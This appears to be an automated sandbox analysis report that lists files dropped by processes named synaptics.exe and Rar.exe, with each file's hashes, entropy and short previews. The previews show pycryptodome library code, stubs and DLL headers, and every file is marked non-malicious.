                                                                                                                                                                                      Preview:o..........f}*.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.d...d.k.r:d.d.l.Z.g.Z.e.....D.].\.Z.Z.Z.e.e.j.k.r8e...e.....q)n.d.d.l.m.Z...e.j.Z.e.e.f.Z.G.d.d...d.e...Z.zkd.e.j.v.r_e.j.j.d.k.r_e.d.....e.j.d.k.rme.j.d.k.rme.d.....d.d.l.m.Z...e...Z.e.j Z!e.."e..#d.....Z$e..#d...j%j&Z'd.d...Z(d.d...Z)e)Z*e)Z+e)Z,d.d...Z-d;d.d...Z.d.d...Z/d.d...Z0d.d...Z1G.d.d ..d e...Z2d!d"..Z3d#Z4W.nt..e...y.......d.d.l5Z5d.d$l5m6Z6m7Z7m8Z8m)Z)m*Z*m-Z-m.Z.m,Z,m+Z+..d.d%l9m:Z:..d.d&l5m;Z'..d.Z!g.Z<d'd(..Z,d)d...Z(d*d...Z/d+d...Z0e5j=Z>d.Z?e5j@jAZBe5j@jCZDe5jEZFe5.Ge>..ZHG.d,d-..d-e5jI..ZJd.d...Z1G.d/d0..d0e...ZKd1d"..Z3d2Z4Y.n.w.G.d3d4..d4e...ZLd5d6..ZMd7d8..ZNd9d:..ZOd.S.)<.....N)...byte_string)...pycryptodome_filename.....)...machineryc....................@...s(...e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.d.S.)..._VoidPointerc....................C........d.S.).z&Return the memory location we point toN......selfr....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30875
                                                                                                                                                                                      Entropy (8bit):5.22335411670978
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:HzjEnqf1DECvkHf9R3OPtm6q3YZHjSgfShUUEV6:Hz8CIRePYN3YZHeDzEV6
                                                                                                                                                                                      MD5:09E29690A49BBC4501A083E339F5085E
                                                                                                                                                                                      SHA1:43E6AC799FB5644120E1616246B270ECFB30488C
                                                                                                                                                                                      SHA-256:062C8AE410CD6E62A4B6B64B4D4C98CEDAE873A5936BBFEFC8F334FF1C1AA88C
                                                                                                                                                                                      SHA-512:95964F50C25D97A73623682350191EC8437283E2BD98B1A52D441D81E885998812FDD4E7821D2B43565837D7656F62F25E68FCF61474A50182906A6558B5F5F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fq........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......N)...byte_string..bchr..bord)...long_to_bytes..bytes_to_long)...DerObject..DerInteger..DerBoolean..DerOctetString..DerNull..DerSequence..DerObjectId..DerBitString..DerSetOfFc....................C...s4...d.}.z.|.|...}.W.n...t.y.......Y.d.S.w.|...p.|.d.k.S.).Nr....F)...TypeError)...x..only_non_negative..test..r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\asn1.py.._is_number(...s..................r....c....................@...s@...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BytesIO_EOFzeThis class differs from BytesIO in that a ValueError exception is. raised whenever EOF is reached.c....................C...s....|.|._.d.|._.d.|._.d.S...Nr....)..._buffer.._index.._bookm
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61128
                                                                                                                                                                                      Entropy (8bit):5.246774965664733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:y5hCN5kZjyUy0lwXEgNjOtg78YrIn6VhjlLQ5DR4wLDzwK2csHXV:y5QkpyUy0lsEgZOtg78sI6VTLQ5DRvv6
                                                                                                                                                                                      MD5:9839C8CACA1D0C528CE4A356AE03454D
                                                                                                                                                                                      SHA1:DA30A521EBBEB4469D0DEE89802E180839B02192
                                                                                                                                                                                      SHA-256:AC302F77B19E805AA88C8D6B158CA88821547D01F190B91FA118B4D1981B74BA
                                                                                                                                                                                      SHA-512:1A5B185BB64AECAC92DB362FCD9B07352DDDB569F577F30CA34CEBFFE165BD8BF02589704B464F0008B5D6527D8D6CD5DBE5E5A1AB3C9F203B86A075880C45A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fh~.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d...Z.d.d...Z.d(d.d...Z.d(d.d...Z.d(d.d...Z.e.j.d.d.....d.k.r>e.j.Z.n.d.d...Z.e.j.d.d.....d.k.rPd.d...Z.n.d.d...Z.d(d.d...Z.d(d.d...Z.d)d.d...Z.d*d.d...Z.d.d.l.Z.d+d.d ..Z.d!d"..Z.d.d.l.Z.d+d#d$..Z.d%d&..Z.d'Z.d.S.),.....N)...Random)...iter_rangec....................C...sP...|.d.k.r.t.....|.d.k.s.|.d.k.r.t.d.....t.|.|...\.}.}.|.d.k.r&|.d.k.r&|.d.7.}.|.S.).zDReturn ceil(n/d), that is, the smallest integer r such that r*d >= nr....z.Non positive values.....)...ZeroDivisionError..ValueError..divmod)...n..d..r..q..r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\number.py..ceil_div%...s....................r....c....................C...s....|.d.k.r.t.d.....|.....S.).z)Returns the size of the number N in bits.r....z4Size in bits only available for non-negative numbers).r......bit_length)...Nr....r....r......size2...s..........r....c....................C...sZ...|.d.u.r.t.j.}.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5247
                                                                                                                                                                                      Entropy (8bit):4.923935118860882
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ZcF/EpktYDLOjIWTmpSaRBF7mgcsi/e/7/9whOJZg+6B6cGZ2B+uWc7xUK6It:ZW/EpkGUIW82bWzL0zJU+
                                                                                                                                                                                      MD5:F7D90110B80B565EDEE6BF8F2C44D21F
                                                                                                                                                                                      SHA1:E956C6E08533AEFFECB26E61D12CAE4D10D38AD9
                                                                                                                                                                                      SHA-256:0A4EF52AB40D320AEDD714B7A8BAAC8170B24C58D44607FF1873CBE4D13CE596
                                                                                                                                                                                      SHA-512:F52AAD4AB0FFFBBA045BEAC6CBD021E867F49BB6E26164462F71BD6051C6163EA8FF7EDA463580447E837A18BC9B0AB93D9D610F78AAD89FA28F649935D3CF9C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fz........................@...sX...d.Z.d.d.l.Z.d.d.l.Z.e.j.d...d.k.r[d.d...Z.d.d...Z.d.d...Z.d.d...Z.d0d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.l.m.Z...e.Z.d.d.l.m.Z...e.Z.d.d...Z.d.d...Z.d.d...Z.e...d.e.f.d.d.i...Z.e.Z.nId d...Z.d!d...Z.d"d...Z.d#d...Z.d0d$d...Z.d%d...Z.d&d...Z.d'd...Z.d.d(l.m.Z...d.d.l.m.Z...d.d)l.m.Z...e.Z.d*d...Z.d+d...Z.d,d...Z.d.d-l.m.Z...e.Z.d.d/..Z.[.[.d.S.)1a....Compatibility code for handling string/bytes changes from Python 2.x to Py3k..In Python 2.x, strings (of type ''str'') contain binary data, including encoded.Unicode text (e.g. UTF-8). The separate type ''unicode'' holds Unicode text..Unicode literals are specified via the u'...' prefix. Indexing or slicing.either type always produces a string of the same type as the original..Data read from a file is always of '''str'' type...In Python 3.x, strings (type ''str'') may only contain Unicode text. The u'...'.prefix and the ''unicode'' type are now redundant. A new type (called.''bytes'') has to b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3258
                                                                                                                                                                                      Entropy (8bit):5.105906166864861
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NYjdkxR/B0sI/LU/kwf+RDQ+XfxGRrccFVQuWP/Z6mQaG8PR02B4Ho4Uw7sR:+xkv/3WLJwyJforccFuz/Z6CG8G1hW
                                                                                                                                                                                      MD5:DAEAD0B028EF37D6B3A42C7F1ED48672
                                                                                                                                                                                      SHA1:C4C513572A7B2BC634AAD302D3C21319D16113EC
                                                                                                                                                                                      SHA-256:8675F4C734F23C631134C318F01B457D2970979446CD2B5F9F53A342E22B1B59
                                                                                                                                                                                      SHA-512:36599A30163DFF9EFDD7A44052BE00BCE6FCFF13B061B4DE928DA733E371973391C706E97E46D14BA83BB06DE1C35D227519250BC0C54BD7DB7D998DEA97BE16
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...sJ...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..create_string_buffer..get_raw_buffer..c_uint8_ptr..is_writeable_bufferz.Crypto.Util._strxoray.... void strxor(const uint8_t *in1,. const uint8_t *in2,. uint8_t *out, size_t len);. void strxor_c(const uint8_t *in,. uint8_t c,. uint8_t *out,. size_t len);. Nc....................C...s....t.|...t.|...k.r.t.d.....|.d.u.r.t.t.|.....}.n.|.}.t.|...s!t.d.....t.|...t.|...k.r1t.d.t.|.........t...t.|...t.|...t.|...t.t.|.........|.d.u.rKt.|...S.d.S.).a....From two byte strings of equal length,. create a third one which is the byte-by-byte XOR of the two... Args:. term1 (bytes/bytearray/memoryview):. Th
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2035
                                                                                                                                                                                      Entropy (8bit):5.0956096784751965
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
                                                                                                                                                                                      MD5:D4DD7789231F56101EAA341F5FD21A95
                                                                                                                                                                                      SHA1:81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
                                                                                                                                                                                      SHA-256:38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
                                                                                                                                                                                      SHA-512:268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                      Entropy (8bit):4.354688723015057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                                                                      MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                                                                      SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                                                                      SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                                                                      SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8704
                                                                                                                                                                                      Entropy (8bit):5.008513190034663
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6Ku39PERtoqPAF+GBWM8o5WJ1ks/vnpjOCD7DaD2eQ5MmGffQTQrXd:6Ku39PE5gjBWMNWJzhjOg5MVnUwN
                                                                                                                                                                                      MD5:E198EFEBB927979BC481F8B109F64C19
                                                                                                                                                                                      SHA1:9EF5F3DDFA2DBD72DD5F94D1CEB911CA1E446CC6
                                                                                                                                                                                      SHA-256:0C75E88EFD4158D687A410F7318B6CE79036C4A419A538BA20E86BEBC750C72B
                                                                                                                                                                                      SHA-512:5BD60A98F8C49BFBC1F30BBBA62BD2216FAD83DD13B4167B0EF24F7FEBFC2A03FF189C3D4754C49798970BCC21F1E9871DE61B85A7DD8498538BBB6590C81BFF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...7..e...........!...%............N........ ...............................`............@..........................$..|...<%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..D.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2225
                                                                                                                                                                                      Entropy (8bit):5.261890106278258
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
                                                                                                                                                                                      MD5:4505C49A1831D0C93256DA8E78C1564B
                                                                                                                                                                                      SHA1:63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
                                                                                                                                                                                      SHA-256:B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
                                                                                                                                                                                      SHA-512:3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):103
                                                                                                                                                                                      Entropy (8bit):4.5743153977203175
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                                                                      MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                                                                      SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                                                                      SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                                                                      SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10877
                                                                                                                                                                                      Entropy (8bit):4.8802384608443194
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IPtqY6t+DqX5WZ0cKqRlpZK0Xn4n/noOKcNeJWAc:0rskrs9VqkYRt+DqX5WZrKq7pZpX4/oC
                                                                                                                                                                                      MD5:B87B25D98E8337122AE998F9ABF4D2B1
                                                                                                                                                                                      SHA1:9B3FC679A26A4300CAE579BACB9AF93677426927
                                                                                                                                                                                      SHA-256:67E1B4E201861F9A86E2DB1E548909CDEE46892CDCE59B3575CD9C7FF755BD54
                                                                                                                                                                                      SHA-512:B15ADEB7D2FC9A050E80499A2CA1D0FD7203E24523C1DF591012AF01E9118B98D384DE0429612D2FEB4D8B9563FBC31A501FE4EE7C53BA2B590DE0A3A0F077F5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):933
                                                                                                                                                                                      Entropy (8bit):4.777842095513583
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                                                                      MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                                                                      SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                                                                      SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                                                                      SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8704
                                                                                                                                                                                      Entropy (8bit):4.962980810410063
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:UKu39PERtoqPAF+GBWM8o5WJ1ks/vnpjOVJ5ApMmGffQTQrXd:UKu39PE5gjBWMNWJzhjOVoMVn0wN
                                                                                                                                                                                      MD5:1B6AB07C1EA3F1A5F28DB01750AC150F
                                                                                                                                                                                      SHA1:F477F97925C51BBB4E0DE498700E4589BEB88F51
                                                                                                                                                                                      SHA-256:08558063C68B9A3C5006F5D78852ECB6CAF6A246CF268E23725DF2DDF7B7F67B
                                                                                                                                                                                      SHA-512:695B5C48D922E66BFAF1518623E7CFA68F8BD0909F310FD2A494D9DB13DAD34D2C6A9BF23294A5C6990CA4EBAC2BD09D50D5B0E31BD162A7337CC04A9AA8A4C7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...9..e...........!...%............N........ ...............................`............@..........................$..t...4%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37233
                                                                                                                                                                                      Entropy (8bit):4.49642341890235
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:pdRLPqWbhH6msz9l3UquMwES5LItw+8hlx:pdRVHU9lkquMwES5LD+8Tx
                                                                                                                                                                                      MD5:9D11029C7D2E1C72C06B462CA3AA996B
                                                                                                                                                                                      SHA1:E783B5F0CC01BC86D0C16D3B4F54300D57C214C8
                                                                                                                                                                                      SHA-256:EEDE3556B282CDC640281A6AB6DF6C7EE20F9BE59C37B01AC09EA32F0F35887E
                                                                                                                                                                                      SHA-512:33D713F6CA8260831AD984D88F279441819308D7C9A3F7A92770D0731BDD74F90EFA46124FAAEACFE74EEACB84D1F6217CA6D01DED3270DF53A5C7D2311B535F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: ascii -*-..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3885
                                                                                                                                                                                      Entropy (8bit):4.815634844501543
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                      MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                      SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                      SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                      SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):97896
                                                                                                                                                                                      Entropy (8bit):4.090850897275891
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                      MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                      SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                      SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                      SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
